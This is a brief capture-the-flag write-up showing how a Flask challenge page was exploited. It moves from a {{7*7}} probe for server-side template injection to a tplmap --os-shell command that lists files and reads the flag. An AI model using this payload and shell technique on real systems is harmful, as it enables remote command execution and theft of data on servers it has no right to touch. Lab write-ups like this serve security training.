Rating: 0

There were some base64 encoded comments in the HTML source code. One of the comment leads to: http://104.154.106.182:5050/?secret=flag

If you look to the HTML source, there is "flag" string. So what about:

http://104.154.106.182:5050/?secret={{7*7}}

Then there is "49" in the source, so it is flask injection: https://github.com/epinna/tplmap


python tplmap.py -u http://104.154.106.182:5050/?secret=flag --os-shell

...
[+] Run commands on the operating system.
posix-linux $ls application.py flag.txt requirements.txt static templates posix-linux$ cat flag.txt
encryptCTF{!nj3c7!0n5_4r3_b4D}